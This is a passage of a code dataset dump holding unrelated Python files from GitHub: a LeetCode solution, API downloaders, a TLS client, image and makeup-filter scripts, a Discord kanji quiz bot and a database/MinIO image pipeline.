self.left = left\n# self.right = right\nclass Solution:\n def leafSimilar(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> bool:\n if not root1 and not root2:\n return True\n elif not (root1 and root2):\n return False\n\n r1 = self._get_leafs(root1)\n r2 = self._get_leafs(root2)\n\n return r1 == r2\n\n def _get_leafs(self, node: TreeNode) -> list[int]:\n ret: list[int] = [] \n def dfs(node: TreeNode):\n if not node.left and not node.right:\n ret.append(node.val)\n \n if node.left:\n dfs(node.left)\n \n \n if node.right:\n dfs(node.right)\n \n dfs(node)\n\n return ret","repo_name":"qtsky89/leetcode","sub_path":"leaf-similar-trees/leaf-similar-trees.py","file_name":"leaf-similar-trees.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24199365508","text":"import json\nimport requests\nimport os\n\nfrom colors import COLOR_CODES\nfrom django.utils.text import slugify\n\nFILEPATH = \"static/assets\"\nCARDS_FILEPATH = f\"{FILEPATH}/cards\"\nDECKS_FILEPATH = f\"{FILEPATH}/decks\"\nCOMMANDERS_FILEPATH = f\"{FILEPATH}/commanders\"\nTHEMES_FILEPATH = f\"{FILEPATH}/themes\"\nTRIBES_FILEPATH = f\"{FILEPATH}/tribes\"\n\n\nBASE_URL = \"https://json.edhrec.com\"\nCARDS_URL = f\"{BASE_URL}/cards\"\nCOMMANDERS_URL = f\"{BASE_URL}/commanders\"\nTRIBES_URL = f\"{BASE_URL}/tribes\"\nTHEMES_URL = f\"{BASE_URL}/themes\"\n\n\ndef download_assets():\n print(\"Downloading assets...\")\n ensure_folders_exist()\n download_commanders_by_color()\n download_themes()\n download_tribes()\n\n\ndef ensure_folders_exist():\n paths = [\n FILEPATH,\n CARDS_FILEPATH,\n COMMANDERS_FILEPATH,\n THEMES_FILEPATH,\n TRIBES_FILEPATH,\n DECKS_FILEPATH,\n ]\n for path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef download_commanders_by_color():\n for color_code in COLOR_CODES:\n filepath = f\"{COMMANDERS_FILEPATH}/{color_code}.json\"\n url = f\"{COMMANDERS_URL}/{color_code}.json\"\n request_asset_and_save(url=url, filepath=filepath)\n\n\ndef download_themes():\n url = \"https://json.edhrec.com/themes.json\"\n filepath = f\"{THEMES_FILEPATH}/themes.json\"\n request_asset_and_save(url, filepath)\n\n asset = retrieve_asset(\"themes/themes.json\")\n for theme in asset[\"container\"][\"json_dict\"][\"cardlists\"][0][\"cardviews\"]:\n theme_url = f\"{BASE_URL}{theme['url']}.json\"\n slug = slugify(theme[\"name\"])\n theme_filepath = f\"{THEMES_FILEPATH}/theme-{slug}.json\"\n request_asset_and_save(theme_url, theme_filepath)\n\n # Save additional themes\n url = \"https://json.edhrec.com/themes-themesbypopularitysort-1.json\"\n filepath = f\"{THEMES_FILEPATH}/themes-2.json\"\n request_asset_and_save(url, filepath)\n\n asset = retrieve_asset(\"themes/themes-2.json\")\n for theme in asset[\"cardviews\"]:\n theme_url = f\"{BASE_URL}{theme['url']}.json\"\n slug = slugify(theme[\"name\"])\n theme_filepath = f\"{THEMES_FILEPATH}/theme-{slug}.json\"\n request_asset_and_save(theme_url, theme_filepath)\n\n\ndef download_tribes():\n url = \"https://json.edhrec.com/tribes.json\"\n filepath = f\"{TRIBES_FILEPATH}/tribes.json\"\n request_asset_and_save(url, filepath)\n\n asset = retrieve_asset(\"tribes/tribes.json\")\n for tribe in asset[\"container\"][\"json_dict\"][\"cardlists\"][0][\"cardviews\"]:\n tribe_url = f\"{BASE_URL}{tribe['url']}.json\"\n slug = slugify(tribe[\"name\"])\n theme_filepath = f\"{TRIBES_FILEPATH}/tribe-{slug}.json\"\n request_asset_and_save(tribe_url, theme_filepath)\n\n\ndef request_asset_and_save(url, filepath, overwrite=False):\n if os.path.isfile(filepath) and not overwrite:\n return\n if overwrite:\n os.remove(filepath)\n print(f\"Saving {filepath}\")\n response = requests.get(url)\n if response.status_code != 200:\n raise Exception(f\"Could not get {url}\")\n with open(filepath, \"w+\") as f:\n f.write(response.text)\n\n\ndef save_asset_for_commander(slug):\n filepath = f\"{COMMANDERS_FILEPATH}/{slug}.json\"\n url = f\"{COMMANDERS_URL}/{slug}.json\"\n request_asset_and_save(url=url, filepath=filepath)\n\n\ndef retrieve_asset(filename):\n with open(f\"{FILEPATH}/{filename}\") as f:\n data = json.loads(f.read())\n return data\n\n\ndef is_not_asset_file(filepath):\n assets = [\n \"tribes.json\",\n \"themes.json\",\n \"themes-2.json\",\n ]\n return filepath not in assets\n\n\ndef save_asset_for_card(slug):\n if \"/\" in slug:\n # Eg theme or tribe cards, or partner commanders\n slug = slug.split(\"/\")[0]\n filepath = f\"{CARDS_FILEPATH}/{slug}.json\"\n url = f\"{CARDS_URL}/{slug}.json\"\n request_asset_and_save(url=url, filepath=filepath)\n","repo_name":"RobertTownley/MagicTheAutomating","sub_path":"assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"38255013774","text":"import threading\nimport time\nimport requests\nimport multiprocessing\n\n\nfirst_city = \"Lviv\", \"https://api.open-meteo.com/v1/forecast?latitude=49.84&longitude=24.02&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nsecond_city = \"Kyiv\", \"https://api.open-meteo.com/v1/forecast?latitude=50.45&longitude=30.52&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nthird_city = \"Warsaw\", \"https://api.open-meteo.com/v1/forecast?latitude=52.23&longitude=21.01&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nfourth_city = \"London\", \"https://api.open-meteo.com/v1/forecast?latitude=51.51&longitude=-0.131&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nfifth_city = \"Barcelona\", \"https://api.open-meteo.com/v1/forecast?latitude=41.39&longitude=2.16&hourly=temperature_2m,relativehumidity_2m,windspeed_10m\"\nlist_of_today_temperatures = []\n\n\ndef get_weather_forecast(link):\n resp = (requests.get(\n link[1]))\n list_of_temperatures = resp.json()[\"hourly\"][\"temperature_2m\"]\n average_temperature = (sum(list_of_temperatures) / len(list_of_temperatures))\n print(f\"Average temperature in the city {link[0]} - {average_temperature}\")\n today_temperature = [link[0], list_of_temperatures[0]]\n list_of_today_temperatures.append(today_temperature)\n\n\n# looking for the maximum temperature right now\ndef max_temperature_now():\n max_temperature_today = max(list_of_today_temperatures, key=lambda x: x[1])\n print(f\"Now the hottest in {max_temperature_today[0]} - {max_temperature_today[1]}\")\n\n\n# with threads=========================================================\ndef threads_method():\n threads = []\n start_threads_time = time.time()\n t1 = threading.Thread(target=get_weather_forecast(first_city))\n t2 = threading.Thread(target=get_weather_forecast(second_city))\n t3 = threading.Thread(target=get_weather_forecast(third_city))\n t4 = threading.Thread(target=get_weather_forecast(fourth_city))\n t5 = threading.Thread(target=get_weather_forecast(fifth_city))\n threads.append(t1)\n threads.append(t2)\n threads.append(t3)\n threads.append(t4)\n threads.append(t5)\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n end_threads_time = time.time()\n max_temperature_now()\n print(f\"Program ended in {end_threads_time - start_threads_time}\")\n\n\n# with multiprocessing ================================================\ndef multiproc_method():\n print(\">>> multiprocessing\")\n process = []\n start_multiprocessing_time = time.time()\n m1 = multiprocessing.Process(target=get_weather_forecast(first_city))\n m2 = multiprocessing.Process(target=get_weather_forecast(second_city))\n m3 = multiprocessing.Process(target=get_weather_forecast(third_city))\n m4 = multiprocessing.Process(target=get_weather_forecast(fourth_city))\n m5 = multiprocessing.Process(target=get_weather_forecast(fifth_city))\n process.append(m1)\n process.append(m2)\n process.append(m3)\n process.append(m4)\n process.append(m5)\n for m in process:\n m.start()\n for m in process:\n m.join()\n end_multiprocessing_time = time.time()\n max_temperature_now()\n print(f\"Program ended in {end_multiprocessing_time - start_multiprocessing_time}\")\n\n\nif __name__ == \"__main__\":\n threads_method()\n multiproc_method()\n","repo_name":"ellinhoms9/robot_dreams_py","sub_path":"HW16/task1-3.py","file_name":"task1-3.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2601067826","text":"\nimport socket\nimport ssl\nimport time\n\n# IP address and the port number of the server\nSERVER = socket.gethostbyname(socket.gethostname())\nPORT = 15000\nSERVER_ADDRESS = (SERVER, PORT)\n\n# Create an SSL context\ncontext = ssl.SSLContext()\ncontext.verify_mode = ssl.CERT_REQUIRED\n\n# Load CA certificate with which the client will validate the server certificate\ncontext.load_verify_locations(\"./ca.crt\")\n\n# Load client certificate\ncontext.load_cert_chain(certfile=\"./client1.crt\", keyfile=\"./client1.key\")\n\n# Create a client socket\nclientSocket = socket.socket()\n\n# Make the client socket suitable for secure communication\nsecureClientSocket = context.wrap_socket(clientSocket)\nsecureClientSocket.connect(SERVER_ADDRESS)\n\n# Obtain the certificate from the server\nserver_cert = secureClientSocket.getpeercert()\n\n# Validate whether the Certificate is indeed issued to the server\nsubject = dict(item[0] for item in server_cert['subject'])\ncommonName = subject['commonName']\n\nif not server_cert:\n raise Exception(\"Unable to retrieve server certificate\")\n \n\nnotAfterTimestamp = ssl.cert_time_to_seconds(server_cert['notAfter'])\nnotBeforeTimestamp = ssl.cert_time_to_seconds(server_cert['notBefore'])\ncurrentTimeStamp = time.time()\n\nif currentTimeStamp > notAfterTimestamp:\n raise Exception(\"Expired server certificate\")\n \nif currentTimeStamp < notBeforeTimestamp:\n raise Exception(\"Server certificate not yet active\")\n\n# Safe to proceed with the communication\nmsgReceived = secureClientSocket.recv(1024)\nprint(f\"Secure communication received from server: {msgReceived.decode()}\")\n\n# Close the sockets\nsecureClientSocket.close()\nclientSocket.close()\n","repo_name":"AnirudhAchal/Computer-Networks-Lab","sub_path":"Week 5/Q1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35018284726","text":"import click\nimport numpy as np\nfrom PIL import Image\nfrom numpy import asarray\n\ndef convert(infile, outfile=None):\n\timage = Image.open(infile)\n\tdata = asarray(image)\n\tprint(f\"Image size: {data.shape}\")\n\twith open(outfile, 'wb') as f:\n\t\tfor y in range(data.shape[0]):\n\t\t\tfor x in range(data.shape[1]):\n\t\t\t\tv = np.uint16(data[y][x])\n\t\t\t\tf.write(v)\n\n@click.command()\n@click.argument(\"infile\")\n@click.option(\"--outfile\", default=None, help=\"specify output filename (default: replace filename extension with .raw)\")\ndef cli(infile, outfile):\n\tif outfile is None:\n\t\tparts = infile.split('.')\n\t\tparts[-1] = \"raw\"\n\t\toutfile = \".\".join(parts)\n\tconvert(infile, outfile)","repo_name":"bwulff/toraw","sub_path":"src/toraw/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"13652233337","text":"# Html con python, recuperar datos de una pagina web\n\nimport pandas as pd\n\nurl = 'https://es.wikipedia.org/wiki/Anexo:Finales_de_la_Copa_Mundial_de_F%C3%BAtbol'\n\ndataframe = pd.io.html.read_html(url)\nprint(dataframe)\n\n# CONTINUACIÓN EN GOOGLE DRIVE yomacolor42\n\n\n","repo_name":"yoma75/ejercicios-de-python","sub_path":"HTML y excel/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"21067732218","text":"from __future__ import print_function\nfrom datetime import date, datetime, timedelta\n\nimport mysql.connector\n\ncnx = mysql.connector.connect(user='sscm', database='sscm')\n\ncursor = cnx.cursor()\n\ntomorrow = datetime.now().date() + timedelta(days=1)\n\ninsert_query = (\"INSERT INTO item_types \"\n \"(name, description) \"\n \"VALUES (%s, %s)\")\n\ninsert_data = ('Lock','Lock mechanism for rotary table')\n\n\n# Insert new employee\ncursor.execute(insert_query, insert_data)\nid = cursor.lastrowid\n\nprint (\"type created with id: {}\".format(id))\n\n# Make sure data is committed to the database\ncnx.commit()\n\ncursor.close()\ncnx.close()","repo_name":"OlgaRa/sscm","sub_path":"python/insert_mysql.py","file_name":"insert_mysql.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30220884780","text":"import dlib\nimport cv2\nfrom imutils import face_utils\nimport imutils\nimport numpy as np\nimport scipy.interpolate\nfrom copy import deepcopy\nfrom colordict import ColorDict\nfrom PIL import Image\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument('-f', '--filename', required=False,\n help='[Str] File name of image to import',\n default='nicolascage.jpg')\nap.add_argument('-l', '--lipstick', required=False, action='store_false',\n help='Passing this argument removes lipstick', default=True)\nap.add_argument('-e', '--eyeliner', required=False, action='store_false',\n help='Passing this argument removes eyeliner', default=True)\nap.add_argument('-b', '--blush', required=False, action='store_false',\n help='Passing this argument removes blush', default=True)\nap.add_argument('-n', '--nosering', required=False, action='store_false',\n help='Passing this argument removes nose ring', default=True)\nap.add_argument('--lipcolor', required=False, help='[Str] lipstick color', default='red')\nap.add_argument('--eyecolor', required=False, help='[Str] eyeliner color', default='black')\nap.add_argument('--blushcolor', required=False, help='[Str] blush color', default='red')\nap.add_argument('-s', '--showsteps', required=False, action='store_true',\n help='Passing this argument will show output images of each step. Press keyboard to continue through outputs', default=False)\nargs = vars(ap.parse_args())\n\n\nclass ApplyMakeup:\n def __init__(self, image, show_steps=False, lip_color='red', eyeliner_color='black', blush_color='red', colors=ColorDict()):\n self.image = cv2.imread(image)\n self.show_steps = show_steps\n self.lip_color = colors[lip_color]\n self.eyeliner_color = colors[eyeliner_color]\n self.blush_color = colors[blush_color]\n\n # Landmarks\n self.all = None\n self.lips = None\n self.right_eye = None\n self.left_eye = None\n\n def get_landmarks(self):\n # Initialize dlib face detector and facial landmark predictor\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n\n # Load input image\n image = deepcopy(self.image)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Detect face\n face = detector(gray, 1)[0]\n\n # Determine facial landmarks for the face region, convert landmark x-y coordinates to numpy array\n landmarks_pre = predictor(gray, face)\n landmarks = face_utils.shape_to_np(landmarks_pre)\n self.all = landmarks\n self.lips = landmarks[48:]\n self.right_eye = landmarks[42:48]\n self.left_eye = landmarks[36:42]\n\n if self.show_steps:\n # Iterate over x-y coordinates of facial landmarks and draw them on image\n for i, (x, y) in enumerate(landmarks):\n cv2.circle(image, (x, y), 3, (0, 0, 255), -1)\n cv2.putText(image, str(i), (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (0, 0, 0), 1)\n\n # Show output image with facial landmarks\n cv2.imshow('Landmarks', image)\n cv2.waitKey(0)\n\n def get_mask(self, region_pts):\n # Create binary mask of ROI\n mask = np.zeros_like(self.image)\n if len(region_pts) > 2:\n mask = cv2.fillPoly(mask, [region_pts], (255, 255, 255))\n else:\n cv2.circle(mask, region_pts, int(len(mask)/17), (255, 255, 255), -1)\n\n # Show mask\n if self.show_steps:\n cv2.imshow('Mask', mask)\n cv2.waitKey(0)\n return mask\n\n def color_lips(self):\n mask = self.get_mask(self.lips)\n lip_color = np.zeros_like(mask)\n lip_color[:] = self.lip_color[::-1]\n colored_mask = cv2.bitwise_and(mask, lip_color)\n\n # Blur colored mask for realism\n colored_mask = cv2.GaussianBlur(colored_mask, (7, 7), 10)\n\n # Combine colored mask with original\n self.image = cv2.addWeighted(self.image, 1, colored_mask, 0.4, 0)\n\n # Show combined image\n if self.show_steps:\n cv2.imshow('Colored Mask', self.image)\n cv2.waitKey(0)\n\n def eye_liner(self, eye):\n # Create image copy for combining\n overlay = self.image.copy()\n\n # Extract upper and lower sections of eye landmarks\n upper = eye[:4]\n lower = np.vstack((eye[0], eye[3:]))\n\n # Initialize extrapolated point lists\n i_x_extrap = []\n i_y_extrap = []\n\n # Initialize counter\n j = 0\n\n # Iterate over upper and lower sections of eye landmarks\n for i in [upper, lower]:\n\n # Declare upper and lower sections as lists of x and y coordinates\n i_x = list(i[:, 0])\n i_y = list(i[:, 1])\n\n # Move landmarks away from the eye slightly for realism\n # j=0: upper, j=1: lower\n if j < 1:\n i_y[0] -= 5\n i_y[1] -= 4\n i_y[2] -= 4\n i_y[3] -= 5\n\n # Create a copy of y coordinates and move farther from original points\n i_y_new = deepcopy(i_y)\n i_y_new[1] -= 3\n i_y_new[2] -= 3\n else:\n i_y[0] += 1\n i_y[1] += 4\n i_y[2] += 4\n i_y[3] += 3\n i_y_new = deepcopy(i_y)\n i_y_new[1] += 3\n i_y_new[2] += 3\n\n # Interpolate curves from points\n curve_i = scipy.interpolate.interp1d(i_x, i_y, 'quadratic')\n curve_i_new = scipy.interpolate.interp1d(i_x, i_y_new, 'quadratic')\n\n # Create new list of x points and use curve function to obtain smoother list of points\n for point in np.arange(np.min(i_x), np.max(i_x)):\n i_x_extrap.append(point)\n i_y_extrap.append(int(curve_i(point)))\n i_x_extrap.append(point)\n i_y_extrap.append(int(curve_i_new(point)))\n\n # Add to counter to force into if statement for lower\n j += 1\n\n # Declare array and add extrapolated points back into pairs\n i_new = np.zeros((len(i_x_extrap), 2), np.int32)\n i_new[:, 0] = i_x_extrap\n i_new[:, 1] = i_y_extrap\n\n # Add points onto image copy\n for (x, y) in i_new:\n cv2.circle(overlay, (x, y), 2, self.eyeliner_color[::-1], -1)\n\n # Combine copy and original\n self.image = cv2.addWeighted(overlay, 0.3, self.image, 0.7, 0)\n\n # Show result\n if self.show_steps:\n cv2.imshow(\"Eye\", self.image)\n cv2.waitKey(0)\n\n def blush(self, landmarks):\n # Manually chosen points to find a midpoint\n L_points = np.vstack((landmarks[48], landmarks[17]))\n R_points = np.vstack((landmarks[54], landmarks[26]))\n\n for i in [L_points, R_points]:\n # Find midpoint\n i_centroid = (int(np.sum(i[:, 0])/2), int(np.sum(i[:, 1])/2))\n\n # Get mask and color\n mask = self.get_mask(i_centroid)\n blush_color = np.zeros_like(mask)\n blush_color[:] = self.blush_color[::-1]\n\n # Combine, blur, combine\n colored_mask = cv2.bitwise_and(mask, blush_color)\n colored_mask = cv2.GaussianBlur(colored_mask, (77, 77), 1400)\n self.image = cv2.addWeighted(self.image, 1, colored_mask, 0.4, 0)\n\n # Show combined image\n if self.show_steps:\n cv2.imshow('Colored Mask', self.image)\n cv2.waitKey(0)\n\n def nose_ring(self, nose_ring_img):\n # Center nostril points\n nose_pts = (self.all[32], self.all[34])\n\n # Difference between points for image resize\n dx = nose_pts[1][0] - nose_pts[0][0]\n dy = nose_pts[0][1] - nose_pts[1][1]\n\n # Convert main image to PIL\n pil_image = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)\n pil_image = Image.fromarray(pil_image)\n\n # Load nose ring image in PIL to maintain alpha channel\n nose_ring = Image.open(nose_ring_img)\n\n # Convert to array for resize and rotate\n nose_ring = np.array(nose_ring)\n resized = imutils.resize(nose_ring, width=dx)\n rotated = imutils.rotate_bound(resized, -np.degrees(np.arctan2(dy, dx)))\n\n # Convert back to PIL for combining\n nose_ring = Image.fromarray(rotated)\n\n # Combine\n pil_image.paste(nose_ring, (nose_pts[0][0], nose_pts[0][1]-15), nose_ring)\n\n # Convert back to array and switch to BGR\n self.image = np.array(pil_image)\n self.image = self.image[:, :, ::-1]\n\n # Show\n if self.show_steps:\n cv2.imshow('Nose Ring', self.image)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n\n # Initialize makeup image object\n makeup_image = ApplyMakeup(args['filename'],\n lip_color=args['lipcolor'],\n eyeliner_color=args['eyecolor'],\n blush_color=args['blushcolor'],\n show_steps=args['showsteps'])\n\n # Obtain facial landmarks\n makeup_image.get_landmarks()\n\n # Apply lipstick\n if args['lipstick']:\n makeup_image.color_lips()\n\n # Apply blush\n if args['blush']:\n makeup_image.blush(makeup_image.all)\n\n # Apply eyeliner\n if args['eyeliner']:\n makeup_image.eye_liner(makeup_image.right_eye)\n makeup_image.eye_liner(makeup_image.left_eye)\n\n # Apply nose ring\n if args['nosering']:\n makeup_image.nose_ring('nose_ring.png')\n\n # Write image to file\n cv2.imwrite('{}_with_makeup.jpg'.format(args['filename'].split('.')[0]), makeup_image.image)\n\n # Show final output\n print('[INFO] Displaying final output...')\n cv2.imshow(\"Final output - Exit with keystroke\", makeup_image.image)\n cv2.waitKey(0)\n","repo_name":"joeyhark/makeup_applier","sub_path":"apply_makeup.py","file_name":"apply_makeup.py","file_ext":"py","file_size_in_byte":9980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71909904224","text":"from torchvision import transforms\n\nNIH_normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\nChexPert_normalize = transforms.Normalize(mean=[0.485],\n std=[0.229])\n\n# transforms.RandomHorizontalFlip() not used because some disease might be more likely to the present in a specific lung (lelf/rigth)\nNIH_transform = transforms.Compose([transforms.ToPILImage(), \n transforms.Resize(256),\n transforms.ToTensor(),\n NIH_normalize])\n\nChexPert_transform = transforms.Compose([transforms.Resize([256,256]),\n transforms.ToTensor(),\n ChexPert_normalize])","repo_name":"hphp777/FedBalance_clean","sub_path":"data/preprocessing/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13435330659","text":"from time import time\nt1 = time()\n\nimport matplotlib.pyplot as plt\nfrom numpy import zeros,arange\nfrom math import pi\n\n\nfrom mcCircle import *\n\nwidth = 400\nheight = 400\na = 200\nb = 200\nr = 200\n\niterStart = 100\niterStep = 100\niterEnd = 10000\n\niterMarker = 10000\n\nmapArea = width*height\ncircleArea = pi*(r**2)\ncirclePercent = (circleArea/mapArea)*100\n\nif iterEnd > (pi*(r**2)):\n print(\"Sampling iteration is more than the circle area! Should be lower than %.0f.\" % pi*(r^2))\n\ni = 0\ntotalPercent = []\n\nfor mcIter in range(iterStart,iterEnd+iterStep,iterStep):\n map01 = zeros((width,height))\n pixIn, pixPercent = createCircle(width,height,a,b,r,mcIter,map01)\n totalPercent.append(pixPercent)\n i = i+1\n if mcIter % iterMarker == 0:\n print(\"Iteration to %d\" % mcIter)\n\nxAxis = arange(iterStart,iterEnd+iterStep,iterStep)\nfig,axs = plt.subplots()\naxs.plot(xAxis,totalPercent,linewidth=0.75,label='Analytic Calc.')\naxs.hlines(circlePercent,iterStart,iterEnd,color='r',linewidth=0.75,label='Monte Carlo Calc.')\naxs.set_xlabel('Sampling Frequency')\naxs.set_ylabel('Circle Percentage')\naxs.legend(loc='upper right')\n\nplt.show()\n\nt2 = time()\nts = (t2 - t1)/60\nprint('Execution time: ', ts,' minutes.')","repo_name":"shpratama/nanocaffeine","sub_path":"tahap01/mcRun01.py","file_name":"mcRun01.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31747914390","text":"import os\nfrom typing import Optional\nimport random\nimport aiohttp\n\nimport dotenv\nimport hikari\nimport lightbulb\nfrom hikari import Intents\nimport asyncio\n\nfrom util_read_csv import build_db\n\ndotenv.load_dotenv()\nINTENTS = Intents.GUILD_MEMBERS | Intents.GUILDS\n\nbot = lightbulb.BotApp(\n os.environ[\"BOT_TOKEN\"],\n intents=hikari.Intents.ALL_MESSAGES,\n banner=None,\n)\n\n@bot.command\n@lightbulb.command(\"test\", description=\"Do the N5 test.\")\n@lightbulb.implements(lightbulb.SlashCommand)\nasync def test(ctx: lightbulb.SlashContext) -> None:\n file_name = 'N5_Kanji.csv'\n option_enum = {'a': 0, 'b': 1, 'c': 2, 'd': 3}\n db = build_db(file_name)\n candidate = random.sample(db.keys(), 16) # 10題,每題4個選項\n question_num = len(candidate)//4\n correct_count = 0\n\n await ctx.respond(\"Choose the correct definition, a, b, c or d.\")\n for i in range(question_num):\n option_list = [db[candidate[i*4]], db[candidate[i*4+1]], db[candidate[i*4+2]], db[candidate[i*4+3]]]\n random.shuffle(option_list)\n\n question = candidate[i*4] + \" means\" + \"\\n\" \\\n + \"a) \" + option_list[0] + \"\\nb) \" + option_list[1] + \"\\nc) \" + option_list[2] + \"\\nd) \" + option_list[3]\n await ctx.respond(question)\n\n try:\n # 要使用回覆功能才會讀到\n event = await ctx.bot.wait_for(hikari.MessageEvent, timeout=20, predicate=lambda e: e.content != None)\n # print(event.content)\n except asyncio.TimeoutError:\n await ctx.respond(\"Timeout!!\")\n else:\n ans = event.content\n if ans in option_enum.keys():\n if option_list[option_enum[ans]] == db[candidate[i*4]]:\n await ctx.respond(\"Nice Job!!\")\n correct_count += 1\n else:\n await ctx.respond(\"You are wrong, the answer is ---> \" + db[candidate[i*4]])\n else:\n await ctx.respond(\"Not valid answer\")\n \n comment = \"\"\n if correct_count <= question_num//4:\n comment = \"You are suck!\"\n elif correct_count >= (question_num*3)//4:\n comment = \"You are great!\"\n else:\n comment = \"You are not bad~\"\n \n await ctx.respond(comment + \"\\nYour final score is \" + str(correct_count) + \"/\" + str(question_num))\n\nif __name__ == \"__main__\":\n bot.run()","repo_name":"Joshmannb/JiaBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"44756956195","text":"from typing import Set\n\nclass Teacher:\n def __init__(self, id: str, name: str, disciplines: Set[str]):\n self.id = id\n self.name = name\n self.disciplines = disciplines\n \n def to_dict(self):\n return {\n \"id\": self.id,\n \"name\" : self.name,\n \"disciplines\": self.disciplines\n }","repo_name":"rene-kt/qxd-ufc-open-api","sub_path":"model/teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20119469466","text":"import psycopg2\nimport os\nimport time\nimport torch.cuda\nimport hashlib\nfrom minio import Minio\nfrom minio.error import S3Error\n\nclass Databases:\n def __init__(self, host, dbname, user, pw, port, minio_host, minio_access_id, minio_access_pw):\n\n # Waiting db initialization\n start_time = time.time()\n while (time.time() - start_time) < 15 :\n try: \n self.conn = psycopg2.connect(host=host, dbname=dbname, user=user, password=pw, port=port)\n self.curs = self.conn.cursor()\n self.table_scheme = \"\"\"\n CREATE TABLE image (\n id SERIAL PRIMARY KEY,\n username VARCHAR(30) REFERENCES user_account,\n image_name VARCHAR(100) NOT NULL,\n image_hash CHAR(64) NOT NULL,\n size int NOT NULL,\n added_date timestamp DEFAULT Now(),\n up int NOT NULL\n )\n \"\"\"\n print(\"DB connected\")\n \n self.minioClient = Minio(\n minio_host,\n access_key=minio_access_id,\n secret_key=minio_access_pw,\n secure=False,\n )\n\n # check bucket.\n found = self.minioClient.bucket_exists(\"images\")\n if not found:\n raise S3Error(f\"bucket does not exist\")\n break\n except psycopg2.OperationalError as e:\n print(e)\n print(\"Waiting DB connection...\")\n time.sleep(1)\n\n \"\"\"\n Initialize the database\n _check_table() checks if the table exists\n _create_table() creates the table\n _drop_table() drops the table\n \n init_db() is called in main.py\n \"\"\"\n def _check_table(self):\n self.curs.execute(\"SELECT EXISTS(SELECT * FROM information_schema.tables WHERE table_name=%s)\", ('image',))\n if not self.curs.fetchone()[0]:\n self._create_table()\n else:\n print(\"Table exists\")\n\n def _create_table(self):\n self.curs.execute(self.table_scheme)\n self.conn.commit()\n print(\"Table created\")\n\n def _drop_table(self):\n self.curs.execute(\"DROP TABLE image\")\n self.conn.commit()\n print(\"Table dropped\")\n\n def init_db(self, force_init=False):\n if force_init:\n self._drop_table()\n self._check_table()\n\n \"\"\"\n Check if there are any image that are not processed\n _check_unprocessed() checks if there are any unprocessed images, and return their's image_name as a list\n _check_pair() checks if there is a pair of images (LQ and SR) for the unprocessed image\n \n glance_db() is called in main.py\n \"\"\"\n def _check_unprocessed(self):\n \"\"\"\n TODO: check up type\n \"\"\"\n self.curs.execute(\"SELECT id FROM image WHERE up != -1 AND NOT EXISTS (SELECT 1 FROM processed_image WHERE id=image.id)\")\n unprocessed = self.curs.fetchall()\n unprocessed = [i[0] for i in unprocessed]\n # print(\"Unprocessed images: \", unprocessed)\n return unprocessed\n\n def _check_pair(self, unprocessed):\n processed = []\n for i in unprocessed:\n self.curs.execute(\"SELECT up FROM processed_image WHERE id = %s\", (i,))\n if self.curs.fetchone():\n\n \"\"\"\n check if the pair (same id, same up) exists\n \"\"\"\n self.curs.execute(\"SELECT up FROM image WHERE id = %s\", (i,))\n up = self.curs.fetchone()[0]\n self.curs.execute(\"SELECT up FROM processed_image WHERE id = %s\", (i,))\n pr_up = self.curs.fetchone()[0]\n\n if up == pr_up:\n processed.append(i)\n\n need_process = list(set(unprocessed) - set(processed))\n return need_process\n\n def glance_db(self):\n unprocessed = self._check_unprocessed()\n # need_process = self._check_pair(unprocessed)\n return unprocessed\n\n \"\"\"\n Process the image\n _download() downloads the image from the database\n _upload() uploads the processed image to the database\n \n process_db() is called in main.py\n \"\"\"\n def _download(self, image_id):\n image = {'id': image_id}\n self.curs.execute(\"SELECT username, image_name, image_hash, up FROM image WHERE id = %s\", (image_id,))\n (image['username'], image['image_name'], image['image_hash'], image['pr_type']) = self.curs.fetchone()\n\n image['image_file'] = self.minioClient.get_object(\"images\", image['image_hash']).read()\n\n path = './LQ/' + str(image['pr_type']) + '/' + str(image_id) + 